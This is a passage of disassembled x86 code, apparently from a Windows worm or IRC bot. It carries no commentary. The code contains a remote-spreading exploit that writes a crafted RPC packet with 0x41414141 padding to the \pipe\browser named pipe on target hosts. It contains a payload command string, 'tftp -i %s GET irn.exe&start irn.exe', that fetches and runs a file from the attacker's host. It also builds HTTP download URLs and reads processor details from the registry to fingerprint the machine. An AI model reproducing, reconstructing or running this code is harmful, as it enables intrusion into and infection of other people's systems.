loc_41AB34:				; CODE XREF: sub_41A690+263j
		lea	eax, [esp+578h+var_548]
		push	eax
		push	[esp+57Ch+var_55C]
		call	dword_427BBC
		test	eax, eax
		jnz	loc_41A8F8

loc_41AB4B:				; CODE XREF: sub_41A690+25Dj
		push	927C0h
		call	ds:off_41D0F8
		jmp	loc_41A8CA
; ---------------------------------------------------------------------------

loc_41AB5B:				; CODE XREF: sub_41A690+14Fj
					; sub_41A690+15Bj ...
		call	ds:dword_41D0DC	; GetCurrentThreadId
		push	eax
		call	sub_41481B
		pop	ecx
		mov	ecx, [esp+578h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41A690	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41AB81	proc near		; CODE XREF: sub_41ACC3+98p

var_5B4		= word ptr -5B4h
var_5B2		= word ptr -5B2h
var_5B0		= dword	ptr -5B0h
var_5A4		= byte ptr -5A4h
var_5A3		= byte ptr -5A3h
var_1A4		= byte ptr -1A4h
var_1A3		= byte ptr -1A3h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 5B4h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	edi
		xor	ebx, ebx
		push	3FFh
		lea	eax, [ebp+var_5A3]
		push	ebx
		push	eax
		mov	[ebp+var_5A4], bl
		call	sub_407F20
		push	18Fh
		lea	eax, [ebp+var_1A3]
		push	ebx
		push	eax
		mov	[ebp+var_1A4], bl
		call	sub_407F20
		xor	eax, eax
		mov	[ebp+var_14], bl
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		stosb
		xor	eax, eax
		lea	edi, [ebp+var_5B4]
		stosd
		stosd
		stosd
		stosd
		mov	eax, [ebp+arg_0]
		add	esp, 18h
		push	216Bh
		mov	[ebp+var_5B4], 2
		mov	[ebp+var_5B0], eax
		call	ds:dword_41D270	; htons
		push	ebx
		push	1
		push	2
		mov	[ebp+var_5B2], ax
		call	ds:dword_41D220	; socket
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_41AC32
		push	eax

loc_41AC1C:				; CODE XREF: sub_41AB81+C7j
		call	ds:dword_41D280	; closesocket
		xor	al, al

loc_41AC24:				; CODE XREF: sub_41AB81+139j
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
; ---------------------------------------------------------------------------

loc_41AC32:				; CODE XREF: sub_41AB81+98j
		push	10h
		lea	eax, [ebp+var_5B4]
		push	eax
		push	edi
		call	ds:dword_41D23C	; connect
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_41AC4A
		push	edi
		jmp	short loc_41AC1C
; ---------------------------------------------------------------------------

loc_41AC4A:				; CODE XREF: sub_41AB81+C4j
		push	esi
		push	ebx
		push	400h
		lea	eax, [ebp+var_5A4]
		push	eax
		push	edi
		call	ds:dword_41D26C	; recv
		push	dword_427FFC
		lea	esi, [ebp+var_14]
		call	sub_4197B6
		mov	eax, esi
		push	eax
		push	offset aTftpISGetIrn_e ; "tftp -i %s GET irn.exe&start irn.exe&ex"...
		lea	eax, [ebp+var_1A4]
		push	18Fh
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_1A4]
		add	esp, 14h
		lea	esi, [eax+1]

loc_41AC92:				; CODE XREF: sub_41AB81+116j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41AC92
		push	ebx
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_1A4]
		push	eax
		push	edi
		call	ds:dword_41D228	; send
		cmp	eax, 0FFFFFFFFh
		pop	esi
		jnz	short loc_41ACBF

loc_41ACB1:				; CODE XREF: sub_41AB81+140j
		push	edi
		call	ds:dword_41D280	; closesocket
		mov	al, bl
		jmp	loc_41AC24
; ---------------------------------------------------------------------------

loc_41ACBF:				; CODE XREF: sub_41AB81+12Ej
		mov	bl, 1
		jmp	short loc_41ACB1
sub_41AB81	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41ACC3	proc near		; DATA XREF: .data:004245A8o

var_124		= byte ptr -124h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 124h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		push	44h
		pop	ecx
		lea	esi, [ebp+arg_0]
		lea	edi, [ebp+var_124]
		rep movsd
		mov	edi, [ebp+var_20]
		push	[ebp+var_1C]
		mov	[ebp+var_14], 2
		mov	[ebp+var_10], edi
		call	ds:dword_41D270	; htons
		push	6
		push	1
		push	2
		mov	[ebp+var_12], ax
		call	ds:dword_41D220	; socket
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jz	short loc_41AD2B
		push	10h
		lea	eax, [ebp+var_14]
		push	eax
		push	esi
		call	ds:dword_41D23C	; connect
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_41AD3B
		push	esi

loc_41AD25:				; CODE XREF: sub_41ACC3+8Fj
		call	ds:dword_41D280	; closesocket

loc_41AD2B:				; CODE XREF: sub_41ACC3+4Dj
					; sub_41ACC3+A0j
		xor	al, al

loc_41AD2D:				; CODE XREF: sub_41ACC3+B2j
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402AD0
		leave
		retn
; ---------------------------------------------------------------------------

loc_41AD3B:				; CODE XREF: sub_41ACC3+5Fj
		push	0
		push	1213h
		push	offset dword_4245E0
		push	esi
		call	ds:dword_41D228	; send
		cmp	eax, 0FFFFFFFFh
		push	esi
		jz	short loc_41AD25
		call	ds:dword_41D280	; closesocket
		push	edi
		call	sub_41AB81
		test	al, al
		pop	ecx
		jz	short loc_41AD2B
		mov	eax, [ebp+var_24]
		imul	eax, 2Ch
		lea	eax, dword_42454C[eax]
		inc	dword ptr [eax]
		mov	al, 1
		jmp	short loc_41AD2D
sub_41ACC3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2C4h


sub_41AD77	proc near		; CODE XREF: sub_40207A+E0p

var_344		= dword	ptr -344h
var_340		= dword	ptr -340h
var_33C		= dword	ptr -33Ch
var_335		= byte ptr -335h
var_334		= byte ptr -334h
var_234		= byte ptr -234h
var_134		= byte ptr -134h
var_133		= byte ptr -133h
var_34		= byte ptr -34h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-2C4h]
		sub	esp, 344h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+2C4h+var_4], eax
		push	ebx
		push	esi
		push	edi
		push	0Bh
		pop	ecx
		mov	esi, offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
		lea	edi, [ebp+2C4h+var_34]
		rep movsd
		movsw
		mov	ebx, 100h
		movsb
		push	ebx
		xor	esi, esi
		lea	eax, [ebp+2C4h+var_334]
		push	esi
		push	eax
		call	sub_407F20
		push	4
		push	offset dword_428230
		push	offset aMhz	; "~MHz"
		lea	eax, [ebp+2C4h+var_34]
		push	eax
		push	4
		call	sub_4176BD
		add	esp, 20h
		test	al, al
		jz	loc_41AF8F
		push	ebx
		lea	eax, [ebp+2C4h+var_334]
		push	eax
		push	offset aProcessornames ; "ProcessorNameString"
		lea	eax, [ebp+2C4h+var_34]
		push	eax
		push	1
		call	sub_4176BD
		add	esp, 14h
		test	al, al
		jz	loc_41AECF
		mov	edi, 0FFh
		push	edi
		lea	eax, [ebp+2C4h+var_133]
		push	esi
		push	eax
		mov	[ebp+2C4h+var_335], 0
		mov	[ebp+2C4h+var_134], 0
		call	sub_407F20
		lea	eax, [ebp+2C4h+var_334]
		push	eax
		push	offset aS_7	; "%s"
		lea	eax, [ebp+2C4h+var_134]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+2C4h+var_134]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_41AE42:				; CODE XREF: sub_41AD77+D0j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41AE42
		sub	eax, esi
		push	ebx
		push	0
		mov	esi, offset byte_428130
		push	esi
		mov	[ebp+eax+2C4h+var_134],	cl
		call	sub_407F20
		add	esp, 0Ch
		xor	ecx, ecx
		mov	[ebp+2C4h+var_33C], ecx

loc_41AE68:				; CODE XREF: sub_41AD77+154j
		cmp	[ebp+2C4h+var_335], 0
		jnz	short loc_41AE7F
		cmp	[ebp+ecx+2C4h+var_134],	20h
		jz	short loc_41AEAF
		mov	[ebp+2C4h+var_335], 1
		dec	ecx
		jmp	short loc_41AEAF
; ---------------------------------------------------------------------------

loc_41AE7F:				; CODE XREF: sub_41AD77+F5j
		movsx	eax, [ebp+ecx+2C4h+var_134]
		push	eax
		push	esi
		push	offset aSC_0	; "%s%c"
		push	edi
		push	esi
		call	sub_402EAE
		mov	eax, esi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41AE9D:				; CODE XREF: sub_41AD77+12Bj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41AE9D
		sub	eax, ecx
		mov	ecx, [ebp+2C4h+var_33C]
		mov	byte_428130[eax], dl

loc_41AEAF:				; CODE XREF: sub_41AD77+FFj
					; sub_41AD77+106j
		lea	eax, [ebp+2C4h+var_134]
		inc	ecx
		lea	edx, [eax+1]
		mov	[ebp+2C4h+var_33C], ecx
		mov	[ebp+2C4h+var_344], edx

loc_41AEBF:				; CODE XREF: sub_41AD77+14Dj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41AEBF
		sub	eax, [ebp+2C4h+var_344]
		cmp	ecx, eax
		jbe	short loc_41AE68
		jmp	short loc_41AF02
; ---------------------------------------------------------------------------

loc_41AECF:				; CODE XREF: sub_41AD77+85j
		push	ebx
		push	esi
		mov	esi, offset byte_428130
		push	esi
		call	sub_407F20
		push	offset aUnknown	; "Unknown"
		mov	edi, 0FFh
		push	edi
		push	esi
		call	sub_402EAE
		add	esp, 18h
		lea	eax, [esi+1]

loc_41AEF3:				; CODE XREF: sub_41AD77+181j
		mov	cl, [esi]
		inc	esi
		test	cl, cl
		jnz	short loc_41AEF3
		sub	esi, eax
		mov	byte_428130[esi], cl

loc_41AF02:				; CODE XREF: sub_41AD77+156j
		and	dword_428234, 0
		mov	[ebp+2C4h+var_33C], 1

loc_41AF10:				; CODE XREF: sub_41AD77+20Dj
		inc	dword_428234
		push	ebx
		lea	eax, [ebp+2C4h+var_234]
		push	0
		push	eax
		call	sub_407F20
		push	[ebp+2C4h+var_33C]
		lea	eax, [ebp+2C4h+var_234]
		push	offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+2C4h+var_234]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_41AF46:				; CODE XREF: sub_41AD77+1D4j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41AF46
		sub	eax, esi
		mov	[ebp+eax+2C4h+var_234],	cl
		lea	eax, [ebp+2C4h+var_340]
		push	eax
		push	1
		push	0
		lea	eax, [ebp+2C4h+var_234]
		push	eax
		push	80000002h
		call	ds:off_41D02C
		test	eax, eax
		jnz	short loc_41AF86
		push	[ebp+2C4h+var_340]
		call	ds:dword_41D010	; RegCloseKey
		inc	[ebp+2C4h+var_33C]
		cmp	[ebp+2C4h+var_33C], 8
		jb	short loc_41AF10

loc_41AF86:				; CODE XREF: sub_41AD77+1FBj
		push	[ebp+2C4h+var_340]
		call	ds:dword_41D010	; RegCloseKey

loc_41AF8F:				; CODE XREF: sub_41AD77+62j
		mov	ecx, [ebp+2C4h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		add	ebp, 2C4h
		leave
		retn
sub_41AD77	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41AFA7	proc near		; CODE XREF: sub_413DDD+20Cp
					; sub_413DDD+31Dp ...

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_1C		= dword	ptr  24h
arg_20		= dword	ptr  28h
arg_28		= dword	ptr  30h
arg_2C		= dword	ptr  34h
arg_30		= dword	ptr  38h
arg_34		= dword	ptr  3Ch
arg_3C		= dword	ptr  44h
arg_40		= byte ptr  48h
arg_4C		= dword	ptr  54h
arg_50		= byte ptr  58h
arg_54		= byte ptr  5Ch
arg_68		= dword	ptr  70h
arg_78		= dword	ptr  80h
arg_7C		= word ptr  84h
arg_80		= dword	ptr  88h
arg_84		= word ptr  8Ch
arg_88		= dword	ptr  90h
arg_8C		= dword	ptr  94h
arg_90		= word ptr  98h
arg_94		= byte ptr  9Ch
arg_98		= dword	ptr  0A0h
arg_9C		= dword	ptr  0A4h
arg_A0		= dword	ptr  0A8h
arg_A4		= dword	ptr  0ACh
arg_A8		= byte ptr  0B0h
arg_AC		= word ptr  0B4h
arg_AE		= word ptr  0B6h
arg_B0		= dword	ptr  0B8h
arg_B4		= word ptr  0BCh
arg_B6		= word ptr  0BEh
arg_B8		= dword	ptr  0C0h
arg_BC		= dword	ptr  0C4h
arg_C0		= word ptr  0C8h
arg_C2		= byte ptr  0CAh
arg_C4		= byte ptr  0CCh
arg_D4		= dword	ptr  0DCh
arg_D8		= byte ptr  0E0h
arg_E8		= dword	ptr  0F0h
arg_EC		= byte ptr  0F4h
arg_1EC		= dword	ptr  1F4h
arg_1F0		= dword	ptr  1F8h
arg_1F8		= dword	ptr  200h
arg_1FD		= byte ptr  205h
arg_200		= byte ptr  208h
arg_201		= byte ptr  209h
arg_210		= byte ptr  218h
arg_211		= byte ptr  219h
arg_310		= byte ptr  318h
arg_311		= byte ptr  319h
arg_40C		= byte ptr  414h
arg_240C	= byte ptr  2414h
arg_4410	= byte ptr  4418h
arg_6410	= dword	ptr  6418h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		mov	eax, 641Ch
		call	sub_4117B0
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+arg_6410],	eax
		push	ebx
		push	esi
		push	edi
		push	44h
		pop	ecx
		lea	esi, [ebp+arg_0]
		lea	edi, [esp+0Ch+arg_EC]
		rep movsd
		mov	eax, [esp+0Ch+arg_1F0]
		push	eax
		mov	[esp+10h+arg_20], eax
		call	ds:dword_41D25C	; inet_ntoa
		xor	ebx, ebx
		mov	[esp+0Ch+arg_14], eax
		mov	[esp+0Ch+arg_8], ebx

loc_41AFF3:				; CODE XREF: sub_41AFA7+70Aj
		cmp	[esp+0Ch+arg_8], 2
		ja	loc_41B6C0
		push	offset dword_41EFE8
		push	[esp+10h+arg_14]
		call	sub_402C69
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41B066
		push	[esp+0Ch+arg_14]
		lea	eax, [esp+10h+arg_40C]
		push	offset dword_41EFEC
		push	2000h
		push	eax
		call	sub_402EAE
		add	esp, 10h
		push	8
		pop	ecx
		xor	eax, eax
		push	ebx
		lea	edi, [esp+10h+arg_54]
		rep stosd
		lea	eax, [esp+10h+arg_40C]
		push	offset byte_41EEFE
		mov	[esp+14h+arg_68], eax
		push	offset byte_41EEFF
		lea	eax, [esp+18h+arg_54]
		push	eax
		call	sub_402A02
		test	eax, eax
		jnz	loc_41B6C0

loc_41B066:				; CODE XREF: sub_41AFA7+69j
		push	[esp+0Ch+arg_14]
		lea	eax, [esp+10h+arg_240C]
		push	offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
		push	2000h
		push	eax
		call	sub_402EAE
		add	esp, 10h
		push	ebx
		push	40000000h
		push	3
		push	ebx
		push	3
		push	0C0000000h
		lea	eax, [esp+24h+arg_240C]
		push	eax
		call	ds:dword_41D06C	; CreateFileA
		cmp	eax, 0FFFFFFFFh
		mov	[esp+0Ch+arg_0], eax
		jz	loc_41B6C0
		push	48h
		lea	eax, [esp+10h+arg_A4]
		push	ebx
		push	eax
		call	sub_407F20
		mov	byte ptr [esp+18h+arg_A4], 5
		mov	byte ptr [esp+18h+arg_A4+1], bl
		mov	byte ptr [esp+18h+arg_A4+2], 0Bh
		mov	byte ptr [esp+18h+arg_A4+3], 3
		mov	dword ptr [esp+18h+arg_A8], 10h
		mov	[esp+18h+arg_AC], 48h
		mov	[esp+18h+arg_AE], bx
		mov	[esp+18h+arg_B0], ebx
		mov	[esp+18h+arg_B4], 10B8h
		mov	[esp+18h+arg_B6], 10B8h
		mov	[esp+18h+arg_B8], ebx
		mov	[esp+18h+arg_BC], 1
		mov	[esp+18h+arg_C0], bx
		mov	[esp+18h+arg_C2], 1
		mov	esi, offset dword_41F00C
		lea	edi, [esp+18h+arg_C4]
		movsd
		movsd
		movsd
		movsd
		mov	[esp+18h+arg_D4], 3
		mov	esi, offset dword_41F020
		lea	edi, [esp+18h+arg_D8]
		movsd
		movsd
		add	esp, 0Ch
		movsd
		push	2
		movsd
		pop	esi
		push	ebx
		lea	eax, [esp+10h+arg_50]
		push	eax
		push	48h
		lea	eax, [esp+18h+arg_A4]
		push	eax
		push	[esp+1Ch+arg_0]
		mov	[esp+20h+arg_E8], esi
		call	ds:dword_41D088	; WriteFile
		test	eax, eax
		jz	loc_41B6B6
		push	ebx
		lea	eax, [esp+0Ch+arg_20]
		push	eax
		push	2000h
		lea	eax, [esp+14h+arg_4410]
		push	eax
		push	[esp+18h+arg_4]
		call	ds:off_41D078
		call	ds:dword_41D104	; GetTickCount
		push	eax
		call	sub_403716
		mov	edx, 41414141h
		mov	eax, edx
		lea	edi, [esp+0Ch+arg_94]
		stosd
		stosd
		stosd
		stosd
		pop	ecx
		stosd
		push	7
		pop	ecx
		mov	eax, edx
		lea	edi, [esp+8+arg_78]
		rep stosd
		call	sub_403723
		mov	dword ptr [esp+8+arg_94], eax
		xor	eax, eax
		inc	eax
		cmp	[esp+8+arg_C], eax
		mov	[esp+8+arg_A0],	eax
		mov	[esp+8+arg_9C],	ebx
		mov	[esp+8+arg_98],	eax
		mov	word ptr [esp+8+arg_A4], bx
		jnz	short loc_41B226
		mov	dword ptr [esp+8+arg_84], eax
		mov	dword ptr [esp+8+arg_7C], eax
		mov	[esp+8+arg_88],	ebx
		jmp	short loc_41B245
; ---------------------------------------------------------------------------

loc_41B226:				; CODE XREF: sub_41AFA7+266j
		cmp	[esp+8+arg_C], ebx
		jnz	short loc_41B24C
		mov	dword ptr [esp+8+arg_84], esi
		mov	dword ptr [esp+8+arg_7C], esi
		mov	[esp+8+arg_88],	2EBh

loc_41B245:				; CODE XREF: sub_41AFA7+27Dj
		mov	[esp+8+arg_80],	ebx

loc_41B24C:				; CODE XREF: sub_41AFA7+283j
		call	sub_403723
		cdq
		mov	esi, 0FAh
		mov	ecx, esi
		idiv	ecx
		inc	edx
		mov	[esp+8+arg_78],	edx
		call	sub_403723
		cdq
		idiv	esi
		mov	eax, [esp+8+arg_C]
		shl	eax, 4
		mov	edi, dword_425808[eax]
		push	edi
		mov	dword ptr [esp+0Ch+arg_90], ebx
		mov	[esp+0Ch+arg_1C], eax
		mov	[esp+0Ch+arg_10], edi
		inc	edx
		mov	[esp+0Ch+arg_8C], edx
		call	sub_403AA0
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		mov	[esp+8+arg_8], esi
		jz	loc_41B6B6
		lea	eax, [edi-2]
		push	eax
		push	90h
		push	esi
		call	sub_407F20
		lea	edi, [esi+edi-2]
		xor	eax, eax
		stosw
		mov	eax, [esp+14h+arg_1C]
		mov	eax, dword_425810[eax]
		lea	edi, [eax+esi]
		mov	esi, offset dword_4257FC
		movsd
		movsw
		add	eax, 7
		movsb
		mov	[esp+14h+arg_14], eax
		xor	eax, eax
		mov	[esp+14h+arg_200], bl
		lea	edi, [esp+14h+arg_201]
		stosd
		stosd
		stosd
		stosw
		stosb
		add	esp, 0Ch
		mov	edi, 0FFh
		push	edi
		lea	eax, [esp+0Ch+arg_311]
		push	ebx
		push	eax
		mov	[esp+14h+arg_310], bl
		call	sub_407F20
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+0Ch+arg_211]
		push	ebx
		push	eax
		mov	[esp+14h+arg_210], bl
		call	sub_407F20
		add	esp, 0Ch
		cmp	[esp+8+arg_1FD], bl
		jz	loc_41B3BC
		call	sub_419B37
		test	al, al
		jnz	short loc_41B3A3
		push	dword_427FFC
		lea	esi, [esp+0Ch+arg_200]
		call	sub_4197B6
		lea	esi, [esp+0Ch+arg_310]
		mov	ebx, offset byte_426671
		mov	[esp+0Ch+var_C], 100h
		call	sub_419EC1
		pop	ecx
		mov	eax, esi
		push	eax
		push	dword_427BD4
		lea	eax, [esp+10h+arg_200]
		push	eax
		push	offset aHttpSDS_0 ; "http://%s:%d/%s"
		lea	eax, [esp+18h+arg_210]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [esp+20h+arg_210]
		add	esp, 18h
		lea	ecx, [eax+1]

loc_41B39A:				; CODE XREF: sub_41AFA7+3F8j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41B39A
		jmp	short loc_41B41F
; ---------------------------------------------------------------------------

loc_41B3A3:				; CODE XREF: sub_41AFA7+395j
		push	100h
		lea	esi, [esp+0Ch+arg_210]
		mov	ebx, offset dword_426434
		call	sub_419EC1
		pop	ecx
		jmp	short loc_41B429
; ---------------------------------------------------------------------------

loc_41B3BC:				; CODE XREF: sub_41AFA7+388j
		push	dword_427FFC
		lea	esi, [esp+0Ch+arg_200]
		call	sub_4197B6
		lea	esi, [esp+0Ch+arg_310]
		mov	ebx, offset byte_426671
		mov	[esp+0Ch+var_C], 100h
		call	sub_419EC1
		pop	ecx
		mov	eax, esi
		push	eax
		push	dword_427BD4
		lea	eax, [esp+10h+arg_200]
		push	eax
		push	offset aHttpSDS_1 ; "http://%s:%d/%s"
		lea	eax, [esp+18h+arg_210]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [esp+20h+arg_210]
		add	esp, 18h
		lea	ecx, [eax+1]

loc_41B418:				; CODE XREF: sub_41AFA7+476j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41B418

loc_41B41F:				; CODE XREF: sub_41AFA7+3FAj
		sub	eax, ecx
		mov	[esp+eax+8+arg_210], 0

loc_41B429:				; CODE XREF: sub_41AFA7+413j
		lea	eax, [esp+8+arg_210]
		push	eax
		call	sub_414B19
		mov	esi, eax
		test	esi, esi
		pop	ecx
		jz	loc_41B6D7
		push	esi
		push	1
		call	sub_4148F8
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_41B461
		push	esi
		push	2
		call	sub_4148F8
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	loc_41B6D7

loc_41B461:				; CODE XREF: sub_41AFA7+4A6j
		mov	esi, [esp+8+arg_8]
		dec	eax
		push	eax
		mov	eax, [esp+0Ch+arg_14]
		add	eax, esi
		push	offset byte_435118
		push	eax
		call	sub_407FA0
		mov	eax, [esp+14h+arg_1C]
		mov	eax, dword_42580C[eax]
		add	esp, 0Ch
		cmp	[esp+8+arg_C], 1
		jnz	short loc_41B4B8
		mov	ecx, dword_4352CC
		mov	[eax+esi], ecx
		mov	ecx, dword_425824
		add	eax, 0Ch
		mov	[eax+esi], ecx
		mov	ecx, dword_425824
		lea	eax, [eax+esi+24h]
		mov	[eax], ecx
		mov	ecx, dword_425824
		mov	[eax+0Ch], ecx
		jmp	short loc_41B4D2
; ---------------------------------------------------------------------------

loc_41B4B8:				; CODE XREF: sub_41AFA7+4E3j
		cmp	[esp+8+arg_C], 0
		jnz	short loc_41B4D2
		push	10h
		add	eax, esi
		pop	ecx

loc_41B4C4:				; CODE XREF: sub_41AFA7+529j
		mov	edx, dword_425824
		mov	[eax], edx
		add	eax, 4
		dec	ecx
		jnz	short loc_41B4C4

loc_41B4D2:				; CODE XREF: sub_41AFA7+50Fj
					; sub_41AFA7+516j
		mov	edi, [esp+8+arg_10]
		add	edi, 42h
		push	edi
		call	sub_403AA0
		mov	ebx, eax
		test	ebx, ebx
		pop	ecx
		jz	loc_41B6ED
		push	edi
		push	0
		push	ebx
		call	sub_407F20
		push	5
		pop	ecx
		lea	esi, [esp+14h+arg_94]
		mov	edi, ebx
		rep movsd
		mov	esi, [esp+14h+arg_10]
		mov	eax, esi
		test	eax, eax
		mov	[esp+14h+arg_10], eax
		fild	[esp+14h+arg_10]
		jge	short loc_41B519
		fadd	ds:flt_420EC0

loc_41B519:				; CODE XREF: sub_41AFA7+56Aj
		fmul	ds:dbl_420EB8
		add	esp, 4
		fstp	[esp+10h+arg_10]
		fld	[esp+10h+arg_10]
		fstp	qword ptr [esp]
		call	sub_404170
		fstp	[esp+10h+arg_10]
		fld	[esp+10h+arg_10]
		call	sub_41C826
		and	dword ptr [ebx+18h], 0
		push	esi
		push	[esp+14h+arg_8]
		mov	[ebx+1Ch], eax
		mov	[ebx+14h], eax
		lea	eax, [ebx+20h]
		push	eax
		call	sub_407FA0
		add	esp, 14h
		lea	eax, [esi+20h]
		jmp	short loc_41B560
; ---------------------------------------------------------------------------

loc_41B55F:				; CODE XREF: sub_41AFA7+5BBj
		inc	eax

loc_41B560:				; CODE XREF: sub_41AFA7+5B6j
		test	al, 3
		jnz	short loc_41B55F
		push	7
		lea	edi, [ebx+eax]
		pop	ecx
		push	[esp+8+arg_8]
		add	eax, 1Ch
		lea	esi, [esp+0Ch+arg_78]
		rep movsd
		mov	[esp+0Ch+arg_14], eax
		call	sub_4039C3
		pop	ecx
		push	6
		xor	eax, eax
		pop	ecx
		lea	edi, [esp+8+arg_28]
		rep stosd
		mov	byte ptr [esp+8+arg_28+1], al
		mov	byte ptr [esp+8+arg_28+2], al
		lea	edi, [esp+8+arg_40]
		stosd
		xor	esi, esi
		stosd
		stosd
		push	esi
		push	esi
		stosd
		push	1
		push	esi
		mov	byte ptr [esp+18h+arg_28], 5
		mov	byte ptr [esp+18h+arg_28+3], 3
		mov	[esp+18h+arg_2C], 10h
		mov	word ptr [esp+18h+arg_30+2], si
		mov	[esp+18h+arg_34], esi
		mov	word ptr [esp+18h+arg_3C], si
		mov	word ptr [esp+18h+arg_3C+2], 1Fh
		stosd
		call	ds:off_41D09C
		mov	dword ptr [esp+8+arg_50], eax
		mov	byte ptr [esp+8+arg_0+3], 0
		mov	[esp+8+arg_8], esi

loc_41B5E1:				; CODE XREF: sub_41AFA7+6CCj
		cmp	[esp+8+arg_8], 2
		jge	loc_41B679
		inc	[esp+8+arg_8]
		push	1
		push	10B8h
		push	[esp+10h+arg_14]
		lea	esi, [esp+14h+arg_28]
		push	ebx
		sub	esp, 18h
		push	6
		pop	ecx
		mov	edi, esp
		push	[esp+30h+arg_4]
		rep movsd
		call	sub_41755C
		add	esp, 2Ch
		test	al, al
		jz	short loc_41B679
		cmp	dword ptr [esp+8+arg_50], 0
		jz	short loc_41B66E
		lea	eax, [esp+8+arg_40]
		push	eax
		lea	eax, [esp+0Ch+arg_20]
		push	eax
		push	2000h
		lea	eax, [esp+14h+arg_4410]
		push	eax
		push	[esp+18h+arg_4]
		call	ds:off_41D078
		test	eax, eax
		jnz	short loc_41B653
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		cmp	eax, 3E5h
		jnz	short loc_41B66E

loc_41B653:				; CODE XREF: sub_41AFA7+69Dj
		push	3E8h
		push	dword ptr [esp+0Ch+arg_50]
		call	ds:off_41D07C
		cmp	eax, 102h
		jnz	short loc_41B66E
		mov	byte ptr [esp+8+arg_0+3], 1

loc_41B66E:				; CODE XREF: sub_41AFA7+678j
					; sub_41AFA7+6AAj ...
		cmp	byte ptr [esp+8+arg_0+3], 0
		jz	loc_41B5E1

loc_41B679:				; CODE XREF: sub_41AFA7+63Fj
					; sub_41AFA7+671j
		push	[esp+8+arg_4]
		mov	esi, ds:dword_41D0D8
		call	esi	; CloseHandle
		push	ebx
		call	sub_4039C3
		cmp	[esp+10h+arg_4C], 0
		pop	ecx
		jz	short loc_41B699
		push	[esp+0Ch+arg_4C]
		call	esi	; CloseHandle

loc_41B699:				; CODE XREF: sub_41AFA7+6EAj
		cmp	byte ptr [esp+13h], 0
		jnz	short loc_41B6FA
		cmp	[esp+0Ch+arg_8], 0
		jnz	short loc_41B6C0
		mov	[esp+0Ch+arg_8], 1
		xor	ebx, ebx
		jmp	loc_41AFF3
; ---------------------------------------------------------------------------

loc_41B6B6:				; CODE XREF: sub_41AFA7+1E5j
					; sub_41AFA7+2F7j
		push	[esp+8+arg_4]
		call	ds:dword_41D0D8	; CloseHandle

loc_41B6C0:				; CODE XREF: sub_41AFA7+51j
					; sub_41AFA7+B9j ...
		xor	al, al

loc_41B6C2:				; CODE XREF: sub_41AFA7+7A5j
		mov	ecx, [esp+0Ch+arg_6410]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_41B6D7:				; CODE XREF: sub_41AFA7+494j
					; sub_41AFA7+4B4j
		push	[esp+8+arg_4]
		call	ds:dword_41D0D8	; CloseHandle
		push	[esp+0Ch+arg_4]

